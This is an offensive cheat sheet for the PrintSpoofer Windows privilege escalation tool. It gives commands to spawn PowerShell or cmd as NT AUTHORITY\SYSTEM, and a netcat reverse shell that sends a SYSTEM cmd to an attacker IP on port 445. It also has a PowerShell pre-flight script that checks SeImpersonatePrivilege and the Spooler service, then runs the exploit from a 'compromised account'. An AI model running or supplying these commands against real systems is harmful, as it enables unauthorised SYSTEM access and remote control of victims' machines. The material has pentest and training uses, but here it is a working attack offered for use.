PrintSpoofer
Description
Windows privilege escalation tool that abuses SeImpersonatePrivilege to escalate from a service account to NT AUTHORITY\SYSTEM. It coerces the Print Spooler service into connecting to a named pipe the tool controls, impersonates the SYSTEM token obtained from that connection, and uses it to spawn a process as SYSTEM. Any account holding SeImpersonatePrivilege (typically service accounts such as LOCAL SERVICE, NETWORK SERVICE, IIS application pool identities or MSSQL service accounts, e.g. after landing a web shell) can use it. Two builds ship with the tool, PrintSpoofer32.exe and PrintSpoofer64.exe; use the one matching the target architecture.
Usage 1: Spawn an Interactive PowerShell as SYSTEM
Use the -i flag for interactive mode and -c to specify the command to execute. -i attaches the new process to the current console; without it the process runs detached and you see no output. This spawns an interactive PowerShell session running as NT AUTHORITY\SYSTEM.
Command:
.\PrintSpoofer32.exe -i -c powershell
Usage 2: Spawn an Interactive PowerShell with Full Path
Specify the full path to the PowerShell executable for environments where the short name does not resolve (restricted or stripped PATH). The single quotes below are fine from a PowerShell prompt; from cmd.exe use double quotes instead, since cmd does not treat single quotes as quoting characters.
Command:
.\PrintSpoofer32.exe -i -c 'C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe'
Usage 3: Get a Reverse Shell as SYSTEM
Instead of spawning an interactive shell, use PrintSpoofer to execute a reverse shell: nc.exe connects back to the attacker's listener (here 192.168.45.187 on port 445) with cmd attached to the socket. Start the listener first (e.g. nc -lvnp 445). The -i flag is not needed because all output goes over the socket.
Command:
C:\Users\Tony\Desktop\PrintSpoofer32.exe -c "C:\Users\Tony\Desktop\nc.exe 192.168.45.187 445 -e cmd"
Notes
- Requires SeImpersonatePrivilege to be present in the token (check with whoami /priv).
- Service accounts typically have SeImpersonatePrivilege enabled by default.
- Requires the Print Spooler service (Spooler) to be running; check with sc query spooler. If it is stopped or disabled, PrintSpoofer cannot work.
- If PrintSpoofer does not work (e.g., timeout errors), try alternative tools such as EfsPotato or JuicyPotato. Note that JuicyPotato does not work on Windows 10 1809+ / Server 2019+, whereas PrintSpoofer and EfsPotato do.
- If the account is nt authority\local service (or network service) and lacks SeImpersonatePrivilege, use FullPowers.exe first to recover the default privilege set including SeImpersonatePrivilege, then run PrintSpoofer.
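The checks in the notes above, rolled into one pre-flight script. This is an added example and not part of PrintSpoofer or its documentation; it assumes PrintSpoofer32.exe and PrintSpoofer64.exe are in the current directory, and the hypothetical Invoke-PrintSpooferPreflight name is my own.

```powershell
# Added example (not PrintSpoofer's own code): verify the prerequisites from the
# notes above, pick the right build, then spawn a SYSTEM cmd and confirm identity.
# Assumes PrintSpoofer32.exe / PrintSpoofer64.exe are in the current directory.
function Invoke-PrintSpooferPreflight {
    # 1. Does the current token hold SeImpersonatePrivilege?
    $priv = whoami /priv | Select-String -Pattern 'SeImpersonatePrivilege'
    if (-not $priv) {
        Write-Host "[-] SeImpersonatePrivilege not in token. If running as LOCAL/NETWORK SERVICE, try FullPowers.exe first."
        return $false
    }
    Write-Host "[+] $($priv.Line.Trim())"

    # 2. Is the Print Spooler running? PrintSpoofer coerces it, so it must be up.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if (-not $spooler -or $spooler.Status -ne 'Running') {
        Write-Host "[-] Spooler service is not running (status: $($spooler.Status)). Fall back to EfsPotato/JuicyPotato."
        return $false
    }
    Write-Host "[+] Spooler service is running"

    # 3. Pick the build matching the OS architecture.
    $exe = if ([Environment]::Is64BitOperatingSystem) { '.\PrintSpoofer64.exe' } else { '.\PrintSpoofer32.exe' }
    if (-not (Test-Path $exe)) {
        Write-Host "[-] $exe not found in the current directory"
        return $false
    }
    Write-Host "[+] Using $exe"

    # 4. Spawn cmd as SYSTEM attached to this console (-i) and print the identity.
    #    Expected output on success: nt authority\system
    & $exe -i -c 'cmd /c whoami'
    return $true
}

Invoke-PrintSpooferPreflight
```

Run it from the compromised account's PowerShell prompt; a $false return tells you which prerequisite failed and which note above applies, while a successful run prints the identity of the spawned process, which should be nt authority\system. Replace the final command with powershell (as in Usage 1) or an nc.exe reverse shell (as in Usage 3) once the checks pass.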